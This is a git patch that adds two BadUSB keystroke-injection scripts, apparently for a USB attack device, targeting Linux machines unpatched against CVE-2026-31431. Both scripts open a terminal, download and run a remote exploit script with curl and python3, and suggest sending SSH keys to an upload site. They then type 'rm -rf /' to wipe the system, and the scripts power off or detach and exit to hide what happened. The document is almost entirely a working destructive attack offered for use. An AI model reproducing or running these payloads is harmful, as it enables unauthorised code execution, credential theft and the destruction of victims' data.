From 188caaa434d5782b79bb33a7158129c49f70b58f Mon Sep 17 00:00:00 2001
From: Jon <git@jonstarkey.co.uk>
Date: Fri, 1 May 2026 23:12:28 +0100
Subject: [PATCH] Added BADUSB folder with CVE-2026-31431 exploit

---
 badusb/CVE-2026-31431.txt | 42 ++++++++++++++++++++++++++++++++++++++
 badusb/payload.txt        | 43 +++++++++++++++++++++++++++++++++++++++
 2 files changed, 85 insertions(+)
 create mode 100644 badusb/CVE-2026-31431.txt
 create mode 100644 badusb/payload.txt

diff --git a/badusb/CVE-2026-31431.txt b/badusb/CVE-2026-31431.txt
new file mode 100644
index 0000000..733ddf4
--- /dev/null
+++ b/badusb/CVE-2026-31431.txt
@@ -0,0 +1,42 @@
+REM #############################
+REM ####### DANGER !! ###########
+REM #############################
+REM This script will wipe a linux machine unpatched to CVE-2026-31431
+REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf
+
+REM GUI launch terminal in kde gnome plasma
+DELAY 500
+GUI
+STRING terminal
+ENTER
+DELAY 500
+
+REM launch via hotkeys for terminal
+DELAY 500
+CTRL-ALT T
+DELAY 200
+ENTER
+ENTER
+
+REM make attack file and exec
+
+STRING curl https://copy.fail/exp -o cve.py
+ENTER
+ENTER
+DELAY 100
+STRING python3 cve.py
+ENTER
+ENTER
+
+REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ 
+REM clean up after
+
+STRING rm -rf /
+REM add 5s delay enough time to think about it before hitting enter or control c
+DELAY 5000
+ENTER
+
+REM poweroff to hide the crash afer 3 seconds and shell will run when rm is done
+DELAY 3000
+STRING poweroff
+ENTER
diff --git a/badusb/payload.txt b/badusb/payload.txt
new file mode 100644
index 0000000..b73d9ed
--- /dev/null
+++ b/badusb/payload.txt
@@ -0,0 +1,43 @@
+REM #############################
+REM ####### DANGER !! ###########
+REM #############################
+REM This script will wipe a linux machine unpatched to CVE-2026-31431
+REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf
+
+REM GUI launch terminal in kde gnome plasma
+DELAY 500
+GUI
+STRING terminal
+ENTER
+DELAY 500
+
+REM launch via hotkeys for terminal
+DELAY 500
+CTRL-ALT T
+DELAY 200
+ENTER
+ENTER
+
+REM make attack file and exec
+
+STRING curl https://copy.fail/exp -o cve.py
+ENTER
+ENTER
+DELAY 100
+STRING python3 cve.py
+ENTER
+ENTER
+
+REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ 
+REM clean up after
+
+STRING rm -rf / && poweroff > /dev/null 2>&1 &
+ENTER
+
+REM detach from the process and close terminal to hide
+delay 100
+STRING disown
+ENTER
+delay 100
+STRING exit
+ENTER